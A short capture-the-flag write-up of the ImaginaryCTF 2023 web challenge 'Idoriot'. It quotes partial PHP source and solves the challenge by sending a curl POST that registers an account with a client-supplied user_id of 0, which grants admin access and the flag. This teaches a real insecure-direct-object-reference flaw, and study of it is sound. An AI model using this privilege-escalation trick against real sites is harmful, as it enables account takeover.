ImaginaryCTF 2023 - Idoriot

Posted on Dec 18, 2023
tl;dr: Some idiot made this web site that you can log in to. The idiot even made it in php. I dunno.


Some idiot made this web site that you can log in to. The idiot even made it in php. I dunno.

Welcome, User ID: 4685491
Source Code


// Check if user is logged in
if (!isset($_SESSION['user_id'])) {
    header("Location: login.php");

// Check if session is expired
if (time() > $_SESSION['expires']) {
    header("Location: logout.php");

// Display user ID on landing page
echo "Welcome, User ID: " . urlencode($_SESSION['user_id']);

// Get the user for admin
$db = new PDO('sqlite:memory:');
$admin = $db->query('SELECT * FROM users WHERE user_id = 0 LIMIT 1')->fetch();

// Check if the user is admin
if ($admin['user_id'] === $_SESSION['user_id']) {
    // Read the flag from flag.txt
    $flag = file_get_contents('flag.txt');
    echo "<h1>Flag</h1>";
    echo "<p>$flag</p>";
} else {
    // Display the source code for this file
    echo "<h1>Source Code</h1>";


Inspecting the registration.php we see that user_id is pregenerated frontend side? wtf we just want to be user_id=0 and we are good to go so

curl -X POST -d 'username=hovno&password=hovno&user_id=0'

login with hovno:hovno and get the flag

Welcome, User ID: 0